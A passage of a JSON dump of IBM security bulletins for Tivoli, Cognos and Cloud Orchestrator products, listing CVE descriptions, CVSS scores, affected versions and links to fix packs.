vulnerability using man-in-the-middle techniques to spoof an SSL server. 
\nCVSS Base Score: 4.3 \nCVSS Temporal Score: See _<https://exchange.xforce.ibmcloud.com/vulnerabilities/95327>_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:S/C:N/I:P/A:N) \n** \nCVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>)** \nDESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n** \nCVEID: **[_CVE-2015-4872_](<https://vulners.com/cve/CVE-2015-4872>)** \nDESCRIPTION:** An invalid (too short) RSA key might be accepted under certain circumstances. The fix ensures that invalid RSA keys are rejected correctly. This issue affects Java deployments which use SSL/TLS communication and/or the java.security.cert.CertPath API. 
\nCVSS Base Score: 5.0 \nCVSS Temporal Score: See [_h_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107361>)[_ttps://exchange.xforce.ibmcloud.com/vulnerabilities/107361_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107361>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N)\n\n## Affected Products and Versions\n\nTivoli Common Reporting 2.1 \n\nTivoli Common Reporting 2.1.1\n\nTivoli Common Reporting 2.1.1.2\n\nTivoli Common Reporting 3.1\n\nTivoli Common Reporting 3.1.0.1\n\nTivoli Common Reporting 3.1.0.2\n\nTivoli Common Reporting 3.1.2\n\nTivoli Common Reporting 3.1.2.1\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the fix for versions listed as soon as practical. \n \n \n\n\n**Tivoli Common reporting release**| **Remediation ** \n---|--- \n2.1| [Install Interim Fix 14](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Tivoli&product=ibm/Tivoli/IBM+Tivoli+Common+Reporting&release=2.1.0.0&platform=All&function=all>) \n2.1.1| [Install Interim Fix 22](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Tivoli&product=ibm/Tivoli/IBM+Tivoli+Common+Reporting&release=2.1.1.0&platform=All&function=all>) \n2.1.1.2| [Install Interim Fix 9](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Tivoli&product=ibm/Tivoli/IBM+Tivoli+Common+Reporting&release=2.1.1.2&platform=All&function=all>) \n3.1.0.0 through 3.1.2| [Download 10.2-BA-CBI-<OS>64-IF0016](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Cognos&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=10.2&platform=All&function=all>) \n[Install 10.2-BA-CBI-<OS>64-IF0016](<http://www-01.ibm.com/support/docview.wss?uid=swg21967299>) \n3.1.2.1| [Download 
10.2.1.1-BA-CBI-<OS>64-IF0012](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Cognos&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=10.2.1.1&platform=All&function=all>) \n[Install 10.2.1.1-BA-CBI-<OS>64-IF0012](<http://www-01.ibm.com/support/docview.wss?uid=swg21967299>) \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:14:17", "type": "ibm", "title": "Security Bulletin: Multiple vulnerability in Product IBM Tivoli Common Reporting (CVE-2015-7436,CVE-2015-7435,CVE-2012-6153,CVE-2014-3577,CVE-2015-7450,CVE-2015-4872)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-6153", "CVE-2014-3577", "CVE-2015-4872", "CVE-2015-7435", "CVE-2015-7436", "CVE-2015-7450"], "modified": "2018-06-17T15:14:17", "id": "F6932FFA729B316CDBF1B06D2938B9D53FBCB3E73735DBB2B0ECB271EC493B76", "href": "https://www.ibm.com/support/pages/node/274387", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:54:30", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae Runtime Environment Java\u2122 Technology Edition, Version 6 and IBM\u00ae 
Runtime Environment Java\u2122 Technology Edition, Version 7 that are used by IBM Cognos Business Intelligence. These issues were disclosed as part of the IBM Java SDK updates in October 2015. \n \nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Cognos Business Intelligence. \n \nAdd/remove users to/from an external (namespace) group could leave them with old permissions. \n \nBackURL prefixed with white-space skips CAF validation. \n \nA security vulnerability has been discovered in the Open Source Apache HttpComponents. \n\n\n## Vulnerability Details\n\n**CVEID: **[_CVE-2015-7436_](<https://vulners.com/cve/CVE-2015-7436>)** \nDESCRIPTION:** Add/remove users to/from an external (namespace) group could leave them with old permissions. \nCVSS Base Score: 2.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107961> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N) \n\n**CVEID: **[_CVE-2015-7435_](<https://vulners.com/cve/CVE-2015-7435>)** \nDESCRIPTION:** BackURL prefixed with white-space skips CAF validation. \nCVSS Base Score: 3.7 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107960> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N) \n \n**CVEID: **[_CVE-__2012-6153_](<https://vulners.com/cve/CVE-2012-6153>)\n\n \n**DESCRIPTION:** Apache HttpComponents could allow a remote attacker to conduct spoofing attacks, caused by an incomplete fix related to the failure to verify that the server hostname matches a domain name in the Subject's Common Name (CN) or SubjectAltName field of certificates. By persuading a victim to visit a Web site containing a specially-crafted certificate, an attacker could exploit this vulnerability using man-in-the-middle techniques to spoof an SSL server. 
\nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/95328> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n\n**CVEID: **[_CVE-2014-3577_](<https://vulners.com/cve/CVE-2014-3577>)\n\n \n**DESCRIPTION:** Apache HttpComponents could allow a remote attacker to conduct spoofing attacks, caused by the failure to verify that the server hostname matches a domain name in the Subject's Common Name (CN) or SubjectAltName field of certificates. By persuading a victim to visit a Web site containing a specially-crafted certificate, an attacker could exploit this vulnerability using man-in-the-middle techniques to spoof an SSL server. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/95327> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:S/C:N/I:P/A:N) \n \n**CVEID:** [CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n**CVEID: **[_C__VE-2015-4872_](<https://vulners.com/cve/CVE-2015-4872>) \n**DESCRIPTION:** An invalid (too short) RSA key might be accepted under certain circumstances. The fix ensures that invalid RSA keys are rejected correctly. This issue affects Java deployments which use SSL/TLS communication and/or the java.security.cert.CertPath API. 
\nCVSS Base Score: 5.0 \nCVSS Temporal Score: See [h](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107361>)[ttps://exchange.xforce.ibmcloud.com/vulnerabilities/107361](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107361>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n\n## Affected Products and Versions\n\n * * IBM Cognos Business Intelligence Server 10.2.2\n * IBM Cognos Business Intelligence Server 10.2.1.1\n * IBM Cognos Business Intelligence Server 10.2.1\n * IBM Cognos Business Intelligence Server 10.2\n * IBM Cognos Business Intelligence Server 10.1.1\n * IBM Cognos Business Intelligence Server 10.1\n * IBM Cognos Business Intelligence Server 8.4.1\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the fix for versions listed as soon as practical. \n \n8.4.1: [](<http://www.ibm.com/support/docview.wss?uid=swg24041190>)<http://www.ibm.com/support/docview.wss?uid=swg24041190> \n10.1.x: <http://www.ibm.com/support/docview.wss?uid=swg24041201> \n10.2.x: <http://www.ibm.com/support/docview.wss?uid=swg24041199>\n\n## Workarounds and Mitigations\n\nNone known. Apply fixes.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T23:13:48", "type": "ibm", "title": "Security Bulletin: IBM Cognos Business Intelligence Server 2015Q4 Security Updater : IBM Cognos Business Intelligence Server is affected by multiple vulnerabilities. 
CVE-2015-7436,CVE-2015-7435,CVE-2012-6153,CVE-2014-3577,CVE-2015-7450,CVE-2015-4872", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-6153", "CVE-2014-3577", "CVE-2015-4872", "CVE-2015-7435", "CVE-2015-7436", "CVE-2015-7450"], "modified": "2018-06-15T23:13:48", "id": "33FF9BBFA013E40A06E5B0AB55B876DFB2EA6711862322A00D2EC4A4BC79A5F7", "href": "https://www.ibm.com/support/pages/node/529355", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:44:49", "description": "## Summary\n\nIBM SmartCloud Cost Management is shipped as a component of IBM Cloud Orchestrator Enterprise and IBM SmartCloud Orchestrator Enterprise. Information about security vulnerabilities affecting IBM SmartCloud Cost Management has been published in a security bulletin.\n\n## Vulnerability Details\n\nConsult the security bulletins for IBM SmartCloud Cost Management for vulnerability details and information about fixes. 
\n\n\n * [Security Bulletin: HTTP response splitting has been identified in IBM WebSphere Application Server Liberty Profile shipped with SmartCloud Cost Management and Tivoli Usage Accounting Manager (CVE-2015-2017)](<http://www-01.ibm.com/support/docview.wss?uid=swg2C1000121>)\n * [Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with SmartCloud Cost Management and Tivoli Usage Accounting Manager (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg2C1000003>) \n\n * * [Security Bulletin: A security vulnerability has been found in IBM WebSphere Application Server 8.5.5.6 shipped with Tivoli Usage and Accounting Manager/SmartCloud Cost Management (CVE-2015-1927)](<http://www.ibm.com/support/docview.wss?uid=swg21964651>) \n \n\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with Tivoli Usage and Accounting Manager/SmartCloud Cost Management. (CVE-2015-1932)](<http://www.ibm.com/support/docview.wss?uid=swg21965064>) \n \n\n * [Security Bulletin: A security vulnerability has been found in IBM WebSphere Application Server 8.5.5.6 shipped with Tivoli Usage and Accounting Manager/SmartCloud Cost Management (CVE-2015-1885)](<http://www.ibm.com/support/docview.wss?uid=swg21964504>)** \n \n**\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with Tivoli Usage and Accounting Manager/SmartCloud Cost Management (CVE-2015-4000)](<http://www.ibm.com/support/docview.wss?uid=swg21964499>) \n \n\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with Tivoli Usage and Accounting Manager/SmartCloud Cost Management. 
(CVE-2015-4938)](<http://www.ibm.com/support/docview.wss?uid=swg21964864>) \n \n\n * [Security Bulletin: Security vulnerabilities have been identified in IBM\u00ae DB2\u00ae shipped with SmartCloud Cost Management (SCCM/TUAM) (CVE-2013-6747, CVE-2014-0963)](<http://www.ibm.com/support/docview.wss?uid=swg21675921>) \n \n\n * [Security Bulletin: Tivoli Usage and Accounting Manager / SmartCloud Cost Management (CVE-2015-1920) ](<http://www.ibm.com/support/docview.wss?uid=swg21957821>) \n \n\n * [Security Bulletin: Vulnerability in RC4 stream cipher affects Tivoli usage and Accounting Manager / SmartCloud Cost Management (CVE-2015-2808, CVE-2015-0138 )](<http://www.ibm.com/support/docview.wss?uid=swg21883107>)\n\n## Affected Products and Versions\n\n** Principal Product and Version**\n\n| ** Affected Supporting Product and Version** \n---|--- \nIBM Cloud Orchestrator Enterprise 2.5, 2.5.0.1| IBM SmartCloud Cost Management 2.1.0.5 \nIBM Cloud Orchestrator Enterprise 2.4 and 2.4.0.1, 2.4.0.2, 2.4.0.3| IBM SmartCloud Cost Management 2.1.0.4 \nIBM SmartCloud Orchestrator Enterprise 2.3 and 2.3.0.1| IBM SmartCloud Cost Management 2.1.0.3 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T22:30:51", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities in IBM SmartCloud Cost Management shipped with IBM Cloud Orchestrator Enterprise and IBM SmartCloud Orchestrator Enterprise", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": 
false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6747", "CVE-2014-0963", "CVE-2015-0138", "CVE-2015-1885", "CVE-2015-1920", "CVE-2015-1927", "CVE-2015-1932", "CVE-2015-2017", "CVE-2015-2808", "CVE-2015-4000", "CVE-2015-4938", "CVE-2015-7450"], "modified": "2018-06-17T22:30:51", "id": "705280D237DEDB26D3D68396BC2097819ADC8127D93D08AF8CFC027E9A703179", "href": "https://www.ibm.com/support/pages/node/262093", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T17:46:09", "description": "## Summary\n\nMultiple vulnerabilities have been identified in IBM Cloud Orchestrator, IBM Cloud Orchestrator Enterprise, and in supporting products shipped with IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise.\n\n## Vulnerability Details\n\nThis security bulletin covers multiple vulnerabilities in IBM Cloud Orchestrator, IBM Cloud Orchestrator Enterprise, and supporting products shipped with IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise. It addresses other vulnerabilities including the IBM SDK, Java Technology Edition October 2015. This security bulletin covers also the Logjam Attack on TLS connections using the Diffie-Hellman (DH) key exchange protocol vulnerability. \n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. 
\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n\n**CVEID:** [_CVE-2015-4872_](<https://vulners.com/cve/CVE-2015-4872>)** \nDESCRIPTION:** An unspecified vulnerability related to the Security component has no confidentiality impact, partial integrity impact, and no availability impact. \nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107361_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107361>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n\n**CVEID:** [_CVE-2015-4734_](<https://vulners.com/cve/CVE-2015-4734>)** \nDESCRIPTION:** An unspecified vulnerability related to the JGSS component could allow a remote attacker to obtain sensitive information. \nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107356_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107356>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N) \n\n**CVEID:** [_CVE-2015-5006_](<https://vulners.com/cve/CVE-2015-5006>)** \nDESCRIPTION:** IBM Java Security Components could allow an attacker with physical access to the system to obtain sensitive information from the Kerberos Credential Cache. 
\nCVSS Base Score: 4.6 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/106309_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106309>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\n**CVEID:** [_CVE-2015-4947_](<https://vulners.com/cve/CVE-2015-4947>) \n**DESCRIPTION:** IBM HTTP Server Administration Server could be vulnerable to a stack buffer overflow, caused by improper handling of user input. An authenticated remote attacker could overflow a buffer and execute arbitrary code on the system. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/104912_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/104912>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [_CVE-2015-4938_](<https://vulners.com/cve/CVE-2015-4938>) \n**DESCRIPTION:** IBM WebSphere Application Server could allow a remote attacker to spoof a servlet. An attacker could exploit this vulnerability to persuade the user into entering sensitive information. \nCVSS Base Score: 3.5 \nCVSS Temporal Score: See _<https://exchange.xforce.ibmcloud.com/vulnerabilities/104415>_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:S/C:N/I:P/A:N)\n\n**CVEID:** [_CVE-2015-4000_](<https://vulners.com/cve/CVE-2015-4000>)** \nDESCRIPTION:** The TLS protocol could allow a remote attacker to obtain sensitive information, caused by the failure to properly convey a DHE_EXPORT cipher suite choice. An attacker could exploit this vulnerability using man-in-the-middle techniques to force a downgrade to 512-bit export-grade cipher. Successful exploitation could allow an attacker to recover the session key as well as modify the contents of the traffic. This vulnerability is commonly referred to as \"Logjam\". 
\nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/103294_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/103294>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\n**CVEID:** [_CVE-2015-3183_](<https://vulners.com/cve/CVE-2015-3183>) \n**DESCRIPTION:** Apache HTTP Server is vulnerable to HTTP request smuggling, caused by a chunk header parsing flaw in the apr_brigade_flatten() function. By sending a specially-crafted request in a malformed chunked header to the Apache HTTP server, an attacker could exploit this vulnerability to poison the web cache, bypass web application firewall protection, and conduct XSS attacks. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/104844_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/104844>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n**CVEID:** [_CVE-2015-2017_](<https://vulners.com/cve/CVE-2015-2017>) \n**DESCRIPTION:** IBM WebSphere Application Server is vulnerable to HTTP response splitting attacks. A remote attacker could exploit this vulnerability using specially-crafted URL to cause the server to return a split response, once the URL is clicked. This would allow the attacker to perform further attacks, such as Web cache poisoning, cross-site scripting, and possibly obtain sensitive information. 
\nCVSS Base Score: 5 \nCVSS Temporal Score: See _<https://exchange.xforce.ibmcloud.com/vulnerabilities/103991>_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N)\n\n**CVEID:** [_CVE-2015-1932_](<https://vulners.com/cve/CVE-2015-1932>) ** \nDESCRIPTION:** IBM WebSphere Application Server and IBM WebSphere Virtual Enterprise could allow a remote attacker to obtain information that identifies the proxy server software being used. \nCVSS Base Score: 5 \nCVSS Temporal Score: See _<https://exchange.xforce.ibmcloud.com/vulnerabilities/102970>_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N)\n\n**CVEID**: [_CVE-2015-3646_](<https://vulners.com/cve/CVE-2015-3646>) \nDescription: OpenStack Keystone could allow a remote attacker to obtain sensitive information, caused by the logging of the backend argument configuration option content. An attacker with read access could exploit this vulnerability to obtain sensitive information about specific backends. \nCVSS Base Score: 4.300 \nCVSS Temporal Score: [_https://exchange.xforce.ibmcloud.com/vulnerabilities/102922_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/102922>) for current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\n**CVEID:** [_CVE-2015-1788_](<https://vulners.com/cve/CVE-2015-1788>) \n**DESCRIPTION:** OpenSSL is vulnerable to a denial of service, caused by an error when processing an ECParameters structure over a specially crafted binary polynomial field. A remote attacker could exploit this vulnerability to cause the application to enter into an infinite loop. 
\nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/103778_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/103778>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n## Affected Products and Versions\n\n**Affected Principal Product and Versions**\n\n| **Affected Supporting Product and Version** \n---|--- \nIBM Cloud Orchestrator 2.4, 2.4.0.1 and 2.4.0.2 and 2.4.0.2 Interim Fix1| IBM Business Process Manager Standard 8.5.0.1 \nIBM HTTP Server 8.5.5 \nIBM Tivoli System Automation Application Manager 4.1 \nIBM Tivoli System Automation for Multiplatforms 4.1 \nIBM Endpoint Manager for Patch Management 9.1 \nIBM DB2 Enterprise Server Edition 10.5.0.2 \nIBM Cloud Orchestrator Enterprise 2.4, 2.4.0.1, 2.4.0.2 and 2.4.0.2 Interim Fix1 | IBM Business Process Manager Standard 8.5.0.1 \nIBM HTTP Server 8.5.5 \nIBM Tivoli System Automation Application Manager 4.1 \nIBM Tivoli System Automation for Multiplatforms 4.1 \nIBM Endpoint Manager for Patch Management 9.1 \nIBM DB2 Enterprise Server Edition 10.5.0.2 \nIBM SmartCloud Cost Management 2.1.0.4 \nIBM Tivoli Monitoring 6.3.0.2 \n \n## Remediation/Fixes\n\nThe recommended solution is to apply the fixes as soon as practical. Please see below for information on the fixes available. \n \nIf you are running IBM Cloud Orchestrator 2.4, 2.4.0.1 or 2.4.0.2, 2.4.0.2 Interim Fix1** **upgrade to [**IBM Cloud Orchestrator 2.4 Fix Pack 3**** (2.4.0.3)**](<http://www.ibm.com/support/docview.wss?uid=swg24040281>). 
\n\n \nFor affected supporting products shipped with IBM Cloud Orchestrator consult the security bulletins below for vulnerability details and apply fixes as appropriate depending on your environment.\n\n**Affected Supporting Product**| **Version**| **Remediation/First Fix** \n---|---|--- \nIBM Business Process Manager \n| 8.5.0.1 \n \n| [_Security Bulletin: Multiple vulnerabilities in IBM Business Process Manager shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator_](<http://www.ibm.com/support/docview.wss?uid=swg21882542>) \nIBM Tivoli System Automation Application Manager| 4.1| [_Security Bulletin: Multiple vulnerabilities in IBM Tivoli System Automation Application Manager shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator_](<http://www.ibm.com/support/docview.wss?uid=swg21882528>) \nIBM Tivoli System Automation for Multiplatforms| 4.1| [_Security Bulletin: Multiple vulnerabilities in IBM Tivoli System Automation for Multiplatforms shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator_](<http://www.ibm.com/support/docview.wss?uid=swg21882549>) \nIBM DB2 Enterprise Server Edition| 10.5.0.2| [_Security Bulletin: Multiple vulnerabilities in IBM DB2 Enterprise Server Edition shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator_](<http://www.ibm.com/support/docview.wss?uid=swg21882724>) \nIBM Endpoint Manager for Patch Management| 9.1| [_Security Bulletin: Multiple vulnerabilities in IBM Endpoint Manager for Patch Management shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator_](<http://www.ibm.com/support/docview.wss?uid=swg21882824>) \n \n \nIf you are running IBM Cloud Orchestrator Enterprise 2.4, 2.4.0.1 or 2.4.0.2, 2.4.0.2 Interim Fix1 upgrade to** ****IBM Cloud Orchestrator Enterprise 2.4 Fix Pack 3 (2.4.0.3)**\n\n \nFor affected supporting products shipped with IBM Cloud Orchestrator Enterprise, consult the security bulletins below for vulnerability details and apply fixes as 
appropriate depending on your environment.\n\n \n \n \n**Affected Supporting Product**| **Version**| **Remediation/First Fix** \n---|---|--- \nIBM Business Process Manager| 8.5.0.1| [_Security Bulletin: Multiple vulnerabilities in IBM Business Process Manager shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator_](<http://www.ibm.com/support/docview.wss?uid=swg21882542>) \nIBM Tivoli System Automation Application Manager| 4.1| [_Security Bulletin: Multiple vulnerabilities in IBM Tivoli System Automation Application Manager shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator_](<http://www.ibm.com/support/docview.wss?uid=swg21882528>) \nIBM Tivoli System Automation for Multiplatforms| 4.1| [_Security Bulletin: Multiple vulnerabilities in IBM Tivoli System Automation for Multiplatforms shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator_](<http://www.ibm.com/support/docview.wss?uid=swg21882549>) \nIBM Endpoint Manager for Patch Management| 9.1| [_Security Bulletin: Multiple vulnerabilities in IBM Endpoint Manager for Patch Management shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator_](<http://www.ibm.com/support/docview.wss?uid=swg21882824>) \nIBM DB2 Enterprise Server Edition| 10.5.0.2| [_Security Bulletin: Multiple vulnerabilities in IBM DB2 Enterprise Server Edition shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator_](<http://www.ibm.com/support/docview.wss?uid=swg21882724>) \nIBM SmartCloud Cost Management| 2.1.0.4| [_Security Bulletin: A security vulnerability in IBM SmartCloud Cost Management shipped with IBM Cloud Orchestrator Enterprise and IBM SmartCloud Orchestrator Enterprise_](<http://www.ibm.com/support/docview.wss?uid=swg21883102>) \nIBM Tivoli Monitoring| 6.3.0.2| [_Security Bulletin: Multiple vulnerabilities in IBM Tivoli Monitoring shipped with IBM Cloud Orchestrator Enterprise and IBM SmartCloud Orchestrator 
